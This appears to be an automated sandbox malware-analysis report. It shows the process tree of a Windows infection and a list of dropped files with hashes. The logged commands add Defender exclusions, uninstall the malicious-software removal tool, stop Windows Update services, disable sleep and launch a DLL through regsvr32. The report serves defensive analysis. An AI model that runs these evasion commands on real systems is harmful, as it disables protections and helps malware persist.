                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5792
                                    • C:\ProgramData\Mig\Mig.exe
                                      C:\ProgramData\Mig\Mig.exe
                                      1⤵
                                        PID:1616
                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:5252
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                          2⤵
                                            PID:7032
                                            • C:\Windows\system32\wusa.exe
                                              wusa /uninstall /kb:890830 /quiet /norestart
                                              3⤵
                                                PID:6620
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop UsoSvc
                                              2⤵
                                              • Launches sc.exe
                                              PID:5824
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                              2⤵
                                              • Launches sc.exe
                                              PID:6140
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop wuauserv
                                              2⤵
                                              • Launches sc.exe
                                              PID:4304
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop bits
                                              2⤵
                                              • Launches sc.exe
                                              PID:1736
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop dosvc
                                              2⤵
                                              • Launches sc.exe
                                              PID:5796
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                              2⤵
                                              • Power Settings
                                              PID:5828
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                              2⤵
                                              • Power Settings
                                              PID:2520
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                              2⤵
                                              • Power Settings
                                              PID:3216
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                              2⤵
                                              • Power Settings
                                              PID:4896
                                            • C:\Windows\system32\dialer.exe
                                              C:\Windows\system32\dialer.exe
                                              2⤵
                                                PID:6948
                                              • C:\Windows\system32\dialer.exe
                                                C:\Windows\system32\dialer.exe
                                                2⤵
                                                  PID:6044
                                                • C:\Windows\system32\dialer.exe
                                                  dialer.exe
                                                  2⤵
                                                    PID:4436
                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                  1⤵
                                                    PID:3344
                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                    1⤵
                                                      PID:7072
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2260 -ip 2260
                                                      1⤵
                                                        PID:5656
                                                      • C:\Windows\system32\regsvr32.EXE
                                                        C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll
                                                        1⤵
                                                          PID:6808
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
                                                            2⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            PID:4224
                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          1⤵
                                                            PID:5652
                                                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                            1⤵
                                                              PID:336

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                              Filesize

                                                              2B

                                                              MD5

                                                              d751713988987e9331980363e24189ce

                                                              SHA1

                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                              SHA256

                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                              SHA512

                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              556084f2c6d459c116a69d6fedcc4105

                                                              SHA1

                                                              633e89b9a1e77942d822d14de6708430a3944dbc

                                                              SHA256

                                                              88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                              SHA512

                                                              0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              195b7121eeefc79bd490d320e3e541f7

                                                              SHA1

                                                              f568a050701fc8cda44a99ee3d2f9737c1865503

                                                              SHA256

                                                              2615c4e9abe9aa8bad25b2863ab9805175cd5e69d832b7705d6d27ce18ebca9c

                                                              SHA512

                                                              b191b159e444d55e6eaec29757c762702748651039527e1bd486af34004d70edb7acda79852e82e960b61a44cb2d8cf47df9941ad7e51f113957f0f708cd4aa7

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              a57816f0c8b0f9bae1f626e6e346eb32

                                                              SHA1

                                                              5dde772fb75fe6f073528b2d11263e6dbd2d1507

                                                              SHA256

                                                              5b660795537dde74bd6594b2be634f60bc0280810d78ccc2175e53e0109a3916

                                                              SHA512

                                                              63ba9e327128d1a9e0977d3aa16a2e2ba02dc065d293cf93554ef52439330c9a1329c805f4831ecb40791cd862bc885ccfe90113dceae1c049e97aa871ef2209

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              a2cfe3bdc77d5665eb18c1331270cfe3

                                                              SHA1

                                                              eb92b240f87f5a04122d7986e79fe03465f6b93b

                                                              SHA256

                                                              2c5485e1510d915c5c227a9f552dc286cf569f1afa8e88a74032a77667513e37

                                                              SHA512

                                                              38941021f8adba0f2c646114d23b95ba0b5e7a49f82c0fb2b2fc19e907f5006f06daea905b2825a72d17492a492ce17836428b2f78f18c0eb6b188cdb2ccf66b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              9a11806a9c266f2b41346ac45f5658ab

                                                              SHA1

                                                              83fe0aef70c4f1099d1c64bf7ade9a920db96887

                                                              SHA256

                                                              5de0d30529a8c542449c303a35c5ca6b878e2442898ada516ee34a32a2bc740e

                                                              SHA512

                                                              bc64f8e63b415f28522c1dcd25ef091c6626dbcfae3e9b5bddce7c17aa27ced86da2663a038e4d6d485a7c4e7e0d13bef75253437da528885f2abf6b2ef88205

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              e1842f97e1321ad114f87dc8d6933c21

                                                              SHA1

                                                              92279f7927958349c079a5aca768499d335583bf

                                                              SHA256

                                                              c54e70e275ad876d7b042bec65c03c35aaa805c08cfe6a58cc5b0490a206f63e

                                                              SHA512

                                                              87e021f5271525d6e20632764d6e6b8d530a068ebdb820d76f6fd258ecf251cd3ed7ffe0aa862b79b9327f57cd402a4b278bf3099c38434621e49c8d47e0c7cf

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\activity-stream.discovery_stream.json

                                                              Filesize

                                                              19KB

                                                              MD5

                                                              6b791834477a9f08923088856b8a0887

                                                              SHA1

                                                              362f6f34302293a86662f8d2781775b19c8e4ad1

                                                              SHA256

                                                              20b95a2678ce2963bfc1be09577f6584645ad6b33e9d72391608188a7adb2b0d

                                                              SHA512

                                                              ec9de410a0fe7f9c907772c95db71a02a10b128b6c313128253cd2f62eddd692dfb77770f86cdd7c60ccb6d50c434d278eefa38054a4548609adfd86edecd5cb

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878

                                                              Filesize

                                                              13KB

                                                              MD5

                                                              ba1e3c615ec1cf877bbf44c8756e0aee

                                                              SHA1

                                                              55c7c535c587c54f866bf836615251ed7b7d1709

                                                              SHA256

                                                              3c78cc565a0f93a8b07a247ed180ff2e56caedd9e284a3ef7a66a0cfe0116d88

                                                              SHA512

                                                              66b0ee354ed3768dea5ad395ef9c7186db8d35a837e804f659b0d690a231f8e3f40097ea6755afc319a118ffd7052017e95aa375fea6efb2f08a123f50919ac9

                                                            • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              fa351b72ffb13bfc332a25a57a7f075f

                                                              SHA1

                                                              5af49613c179bed23dd43d76aedbe3d1b63004a3

                                                              SHA256

                                                              d2c90431f09fc7818c5afb43bbec077fc29544ddcb786bc655a82d1c33e20cdc

                                                              SHA512

                                                              de49eeaa695f9d6252bd3b547689b0e648999c7ee68d2e16a3d073d88505a1c6b0a4da538db7ce52653bfc2dc89a13dd07c894f8e28f9227f1d1c92df67216f9

                                                            • C:\Users\Admin\AppData\Local\Temp\1007999001\ba6bdb3357.exe

                                                              Filesize

                                                              4.2MB

                                                              MD5

                                                              40cb4053a584486a21a109ffb44933c9

                                                              SHA1

                                                              07a94039a6176646ecdb0a5b0fab59b632bdbd18

                                                              SHA256

                                                              71b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84

                                                              SHA512

                                                              58356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3

                                                            • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

                                                              Filesize

                                                              50KB

                                                              MD5

                                                              666248c216a3f63828f739839230f9f6

                                                              SHA1

                                                              13690837235053762a538b4c5b2b601ec9f6bb22

                                                              SHA256

                                                              00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

                                                              SHA512

                                                              37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

                                                            • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              e1cf72329542de8b3004517ee07d8371

                                                              SHA1

                                                              c22ac1f279cc11dffd30a41863181da598231d4b

                                                              SHA256

                                                              301e56052cf570110e66a429c0acc2454569ff5f966af0e809bef33eb2e02baa

                                                              SHA512

                                                              7267aa2244edd22b4ceda89e8e188180bcc409320f77b0d9fc9fbb63c0906ab23dc9dff4bd5e02018aa08194cb8bb8dcd0b28ae1c44b2497a13bb21411ec6edc

                                                            • C:\Users\Admin\AppData\Local\Temp\1008011001\bb5b798a24.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              7c3f6cc60781f4b73188bb0a06a7b0d9

                                                              SHA1

                                                              4d6dfbca12da9b49694aaa697a7dda3574cb6196

                                                              SHA256

                                                              66e70f6ec76a2a0805745110846f007e69cc54021a6ebb11a1ebe55e2e50d607

                                                              SHA512

                                                              ccc6582d0062101e2beb8f57011a57aba9d728383def4818c5831580db4ac803508c900dc9daa26321a170935d5d7b1ce7c7a6d1a415ed6bbebbc11ef9b911db

                                                            • C:\Users\Admin\AppData\Local\Temp\1008012001\41aed9b042.exe

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              7b407627037c3c9873d0a4b806519384

                                                              SHA1

                                                              3c6d470f6d3f29086d4ba50baae4a4dda0c4e20b

                                                              SHA256

                                                              2dae1d172d9d9387bd70c9524d8a0c464a13f03bf0d7c1c6d5f5f1826a6cd4b9

                                                              SHA512

                                                              278bc7f0458dd9fcf73053c52484a67091a0974f0af2ab28165187d6330729e4335214a0a9b905e3240bdb82ee8d5a47f1ca971b9a8aa204218f8fcfbb51cf6c

                                                            • C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe

                                                              Filesize

                                                              901KB

                                                              MD5

                                                              f9ebc264db6c0d8351cb0be0da51a834

                                                              SHA1

                                                              8c3acda5cb40507905023e5cb1025e15620350b2

                                                              SHA256

                                                              41a734a6d39201860f3be6c8765bb256716e2b1f6c73e58e9b46c66fd5009262

                                                              SHA512

                                                              825e59af5045675f0d404e8ed1231b48672996f66046d2439fd6bc7958cb6856e7d33f8e3b56d2a353b7360e9a26f63b18822e14ce08cbffe93920f53026b846

                                                            • C:\Users\Admin\AppData\Local\Temp\1008014001\c8807293c3.exe

                                                              Filesize

                                                              2.7MB

                                                              MD5

                                                              9fdc0979f1e3281023d6cfe460a2912c

                                                              SHA1

                                                              a8027a48aca67f37524c3624985ce49cacc79c3a

                                                              SHA256

                                                              3e185ed3062afd0e280c05f93c257729fcc2d46cf71626b299e3f61ef870d27b

                                                              SHA512

                                                              0f0c12484679a4b3a06b92fc3ecab7a65ff775448af2fefee1e5d8f7b514435ad24bef38f140b27e6489ac335c96894a70928c5813fc33902327f8295085342c

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi3xcst1.r1k.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              da4b77594a6a31a9b1fcbabb65346fa5

                                                              SHA1

                                                              ba835cb96f1e3d8267a973d147a1ccbf80fbd3c4

                                                              SHA256

                                                              436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0

                                                              SHA512

                                                              c9b18ab6193c0e3d84ca93ea23338447e665785f4e6c9fc6b65cc6c9aa924118fcb0d3a26a61e43432ef25c5dc412912f7cd23068cdc22528c565f75061cb687

                                                            • C:\Users\Admin\AppData\Local\Temp\is-CLKU4.tmp\FunnyJellyfish.tmp

                                                              Filesize

                                                              1.1MB

                                                              MD5

                                                              14c6fa8e50b4147075eb922bd0c8b28d

                                                              SHA1

                                                              0faad18b0e26ce3b5c364621a4f0aee9db56a9a7

                                                              SHA256

                                                              90c4a61af494b63ecfe1226714175675a4e49e57d50718491b3bc8fe29dd8fc7

                                                              SHA512

                                                              e6c35bbcaa9a8bb306e58bb91aadf5feed6b1ad1df6ee0e68bf3bae9b76d84c862b4ee9dd87a1d288fe1b7aaaac13467964436a09ec529f67af50905cd0ef876

                                                            • C:\Users\Admin\AppData\Local\Temp\is-DHEVQ.tmp\_isetup\_shfoldr.dll

                                                              Filesize

                                                              22KB

                                                              MD5

                                                              92dc6ef532fbb4a5c3201469a5b5eb63

                                                              SHA1

                                                              3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                              SHA256

                                                              9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                              SHA512

                                                              9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                            • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              82f229d0c36b68073da70ef5958e425d

                                                              SHA1

                                                              2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                              SHA256

                                                              0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                              SHA512

                                                              4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                              Filesize

                                                              479KB

                                                              MD5

                                                              09372174e83dbbf696ee732fd2e875bb

                                                              SHA1

                                                              ba360186ba650a769f9303f48b7200fb5eaccee1

                                                              SHA256

                                                              c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                              SHA512

                                                              b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                              Filesize

                                                              13.8MB

                                                              MD5

                                                              0a8747a2ac9ac08ae9508f36c6d75692

                                                              SHA1

                                                              b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                              SHA256

                                                              32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                              SHA512

                                                              59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                            • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                              Filesize

                                                              27KB

                                                              MD5

                                                              238ec4d17050e1841e8e0171407c2260

                                                              SHA1

                                                              2c8c14b257641f1e1151c6303dabde01621314f2

                                                              SHA256

                                                              163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                              SHA512

                                                              3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                            • C:\Users\Admin\AppData\Roaming\DelightfulCard.dll

                                                              Filesize

                                                              2.6MB

                                                              MD5

                                                              985fef2b6872a1a94726dc3b7f1439de

                                                              SHA1

                                                              e221a5c4f2f222b665c932ab9b1f66189cee3315

                                                              SHA256

                                                              78ef7eacffaba55e653195fe37846375aeb51b164d80ad312afda54163da0622

                                                              SHA512

                                                              41678a3e117cb83e7b99a65a6d0dda86db57ac0441d84ca817d6e04fa3751d4035215e8cd50bcd86b7232d1c28620103264f3a677ac14513d1fa0d977ba94f39

                                                            • C:\Users\Admin\AppData\Roaming\LB31.exe

                                                              Filesize

                                                              7.3MB

                                                              MD5

                                                              c9e6aa21979d5fc710f1f2e8226d9dfe

                                                              SHA1

                                                              d881f97a1fe03f43bed2a9609eae65531cf710cf

                                                              SHA256

                                                              a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

                                                              SHA512

                                                              9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              9e00656309c1645f8c4c1737d3ac4b2a

                                                              SHA1

                                                              0143f028e2b1a074514ea58688ea6631833521c1

                                                              SHA256

                                                              fffbb9c2ceaabaf7545e2f7f004d8e549ed2761092608b131c6e391897a5e566

                                                              SHA512

                                                              40f3d5a0f002df3bb622da13019ce417bba6f47ad21ed0a0673838584d2b4518514f7cb320824fca864509ae8efabc2b8333e4be045fabf2a51e7a2c7de55805

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin

                                                              Filesize

                                                              8KB

                                                              MD5

                                                              479ff6490abc92d18781b08c258a02ce

                                                              SHA1

                                                              28b5560fdb0cb3f02a3f68f5e95dd57019f407d6

                                                              SHA256

                                                              275201c9a818153120aaaf166a107f479fc514506a90095aa3f42a0b47fc22a5

                                                              SHA512

                                                              ce8d52047384767ce4ba179054443f439544b8b49c6951cee37a5b1b1432da84e0627643845de3ab23d7ac08dd4091ff4adb9beaae3029361503b5a32d50d5d1

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp

                                                              Filesize

                                                              15KB

                                                              MD5

                                                              32829bdfc4a7a26b057d1c199e05b940

                                                              SHA1

                                                              f2c3d58a0b9ae666a6cde48a5065db0d725199b9

                                                              SHA256

                                                              975802f73419b00c38ab69d9df2c009a3acfbd8fc926b295e034f783c5652935

                                                              SHA512

                                                              d5ada73aff0d64a79c65f1a956c187d22b0d736d59e32d0dce03124f106aecf708849d6f645212353d73a5847362442197e31b9dec195461fc7a06d6059c972c

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp

                                                              Filesize

                                                              15KB

                                                              MD5

                                                              a1f285838478e7c4c5d2762e4918533c

                                                              SHA1

                                                              2a570b54e8f61aa74d03d2053273431b146ab168

                                                              SHA256

                                                              3bb68689d4d6a746fe37054f35643417ea2161aa685c3916e6980ec83481fb66

                                                              SHA512

                                                              9badbbd68595aaacaaa7f070b467e042187ef5ab1da4a4497892e3eaa5c6bbee9bb8fa059f514e2fb054277fabc55a0267708ee94fdc6e9cb6e13aac6aa017c5

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp

                                                              Filesize

                                                              5KB

                                                              MD5

                                                              1e399145d3a60faa1dbd87711d6a2697

                                                              SHA1

                                                              d60c83d1acde387368e91883946ee130d9b9a1ae

                                                              SHA256

                                                              98b92f44190f9b4fe626ec952e883da4ddc62e0fe61074229004f9dec82b5295

                                                              SHA512

                                                              c14a7f2c0b86eac99274d8ebb800c8f8bff37382ece2f15b0790b976d72070c7211579d8d51fe0c78836cde2ae3ebdfb8b57968f3011ec43f5d9d44fdb08f816

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\d4e8a2ed-ad12-4a7c-90c9-e2ff4ab6a0fa

                                                              Filesize

                                                              671B

                                                              MD5

                                                              f4970030b522de930c9a0db2da5c523a

                                                              SHA1

                                                              4c0c1ddc4df1b79fe885eb157ab19639a717162f

                                                              SHA256

                                                              f7a686694f0f4569a9aa665658cfc543bb4ccff03cf203568b65c9987427e412

                                                              SHA512

                                                              5f0e5fea43e2742d82453f611c70b66e26f148322812f71dff988d599d5ac11a4ed6d5ae047b4fb155a53c9933920052f0dffb6af483073ae3dc33b812e94ece

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\e0074050-4c12-43c0-9c9a-721f2c15cbca

                                                              Filesize

                                                              982B

                                                              MD5

                                                              7abec51ee371fe0bc5753395e4f48f2c

                                                              SHA1

                                                              08f1345f65757fcddf19782c8c586156fa829623

                                                              SHA256

                                                              88a5b82de1c08e4c3b70d34599014349ee4e3cb22d122bc639df392cd13f67f3

                                                              SHA512

                                                              484b22a457391e442d888de0787f4b5689ab67b73a1d38d46ee0bfa0e7389b8c0d84dfcd0ea803dc5786d3c832795f3aeefaeb80056f2146913c1e90ee31bde5

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\e6205251-7dc7-4956-ab1e-cc4b509221d4

                                                              Filesize

                                                              25KB

                                                              MD5

                                                              fa78d60704a877f2d75b8193f454936b

                                                              SHA1

                                                              7b111aafca2151bcb17a9bcd5d44f1a361a8840d

                                                              SHA256

                                                              ce403729729189358f8ac2149524f5fbce6fadcbcacfc2476040071f64c2f6bf

                                                              SHA512

                                                              a1656744fd76abf1e95b4fff3ebd251b7cfe982fe482fba6da5684a97c6d0be2bb2103f1e127c3492211827d00ee00bf6f889853240a6edff35ab4914e494090

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                              Filesize

                                                              1.1MB

                                                              MD5

                                                              842039753bf41fa5e11b3a1383061a87

                                                              SHA1

                                                              3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                              SHA256

                                                              d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                              SHA512

                                                              d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                              Filesize

                                                              116B

                                                              MD5

                                                              2a461e9eb87fd1955cea740a3444ee7a

                                                              SHA1

                                                              b10755914c713f5a4677494dbe8a686ed458c3c5

                                                              SHA256

                                                              4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                              SHA512

                                                              34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                              Filesize

                                                              372B

                                                              MD5

                                                              bf957ad58b55f64219ab3f793e374316

                                                              SHA1

                                                              a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                              SHA256

                                                              bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                              SHA512

                                                              79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                              Filesize

                                                              17.8MB

                                                              MD5

                                                              daf7ef3acccab478aaa7d6dc1c60f865

                                                              SHA1

                                                              f8246162b97ce4a945feced27b6ea114366ff2ad

                                                              SHA256

                                                              bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                              SHA512

                                                              5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              639df7119dc67562e614feabfe12b034

                                                              SHA1

                                                              adf0255fed9081c517fde8d4693d2cc261a055d9

                                                              SHA256

                                                              f4303f9fd53198afd3917cad59615f4acda7806f8da683dea5154660dba8ffaa

                                                              SHA512

                                                              6f7485d058bbdea3b19cb1d07228cb0ff6b47b538c78bc2090e69cdd1d73961b4fbd81a680958f4178af5a2d8f85cb59c5db125004f01b385d1113cf47ceabfe

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs.js

                                                              Filesize

                                                              10KB

                                                              MD5

                                                              1776415c575d1f90eb589416c44b90c8

                                                              SHA1

                                                              323a7811cb4719f97694632cbd2dcdd44216e7c7

                                                              SHA256

                                                              edba326a860d083076b286598dcd9ef9180b3b6f6fe2ba625b20bdd58213e26c

                                                              SHA512

                                                              afa6176d6e69c7f6c445d8101641731b79eec94d228c1834582daaeb60c1b2555b63cbfa9e3958b214f5c03c9e662ae2be884f47e46847dbf511f162d0c9bb15

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs.js

                                                              Filesize

                                                              10KB

                                                              MD5

                                                              0ad1485b514c839aa4effa0fc654f25d

                                                              SHA1

                                                              4ce655df580bb9962fce5e08e5bc4ca7a21df00c

                                                              SHA256

                                                              8ff211ed523f5c5577345ca731f41d782163d52c988ff83a386bb0439cdbab94

                                                              SHA512

                                                              0df5f0c930d2dff8887243d527919cb6728731ca6c2d6ac47e7a4cae0436155df3b62f70cf870e157d6efea5faf898096e7a45cea2303b81c3ca4b1523a73090

                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                              Filesize

                                                              824KB

                                                              MD5

                                                              5d58bac841eb9e8a1f9f9ae96ab4fb85

                                                              SHA1

